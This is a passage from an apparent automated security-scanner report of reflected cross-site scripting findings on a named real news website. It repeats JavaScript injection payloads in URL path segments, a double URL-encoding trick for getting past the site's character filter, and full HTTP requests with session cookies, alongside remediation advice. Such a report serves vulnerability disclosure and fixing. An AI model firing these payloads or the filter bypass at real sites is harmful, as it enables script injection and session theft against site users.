This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx8b91e'%3balert(1)//0d3eac7e4b7/photo_galleries/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:39:57 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 41679
Age: 0
Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 992d0%250aalert%25281%2529%252f%252f00969ae1b92 was submitted in the REST URL parameter 2. This input was echoed as 992d0 alert(1)//00969ae1b92 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local/bronx992d0%250aalert%25281%2529%252f%252f00969ae1b92/photo_galleries/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:40:26 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 41650
Age: 0
Via: AX-CACHE-2.4:20
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b83f'%3balert(1)//6a2ef8ef72e was submitted in the REST URL parameter 3. This input was echoed as 1b83f';alert(1)//6a2ef8ef72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/photo_galleries1b83f'%3balert(1)//6a2ef8ef72e/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:41:06 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70103
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a827'%3balert(1)//02a581348df was submitted in the REST URL parameter 4. This input was echoed as 4a827';alert(1)//02a581348df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/photo_galleries/index.html4a827'%3balert(1)//02a581348df HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:41:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb56'%3b53de86868e3 was submitted in the REST URL parameter 1. This input was echoed as 6fb56';53de86868e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local6fb56'%3b53de86868e3/brooklyn/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:39 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70080
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e578'%3balert(1)//37389a30633 was submitted in the REST URL parameter 1. This input was echoed as 2e578';alert(1)//37389a30633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local2e578'%3balert(1)//37389a30633/brooklyn/2011/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:31 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9313a'%3balert(1)//cb335aa349f was submitted in the REST URL parameter 2. This input was echoed as 9313a';alert(1)//cb335aa349f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn9313a'%3balert(1)//cb335aa349f/2011/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:38:32 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4c35'%3balert(1)//26ae562ff26 was submitted in the REST URL parameter 3. This input was echoed as a4c35';alert(1)//26ae562ff26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011a4c35'%3balert(1)//26ae562ff26/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:39:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93997'%3balert(1)//b5dfdd5923b was submitted in the REST URL parameter 4. This input was echoed as 93997';alert(1)//b5dfdd5923b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/0293997'%3balert(1)//b5dfdd5923b/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:54 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69fbd'%3balert(1)//152d535c61b was submitted in the REST URL parameter 5. This input was echoed as 69fbd';alert(1)//152d535c61b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/0269fbd'%3balert(1)//152d535c61b/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:41:11 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 466dc'%3balert(1)//3cf4fffae02 was submitted in the REST URL parameter 6. This input was echoed as 466dc';alert(1)//3cf4fffae02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/02/2011-02-02_walmart_plans_traffic_jam_in_the_making_opponents_say.html466dc'%3balert(1)//3cf4fffae02 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:25 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70160
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb805'%3balert(1)//02ba0dc762a was submitted in the REST URL parameter 1. This input was echoed as cb805';alert(1)//02ba0dc762a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localcb805'%3balert(1)//02ba0dc762a/brooklyn/2011/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:39:39 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63350'%3balert(1)//08ce8d7da7c was submitted in the REST URL parameter 2. This input was echoed as 63350';alert(1)//08ce8d7da7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn63350'%3balert(1)//08ce8d7da7c/2011/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:28 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ca89'%3balert(1)//5a5d9f3aa90 was submitted in the REST URL parameter 3. This input was echoed as 8ca89';alert(1)//5a5d9f3aa90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/20118ca89'%3balert(1)//5a5d9f3aa90/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; 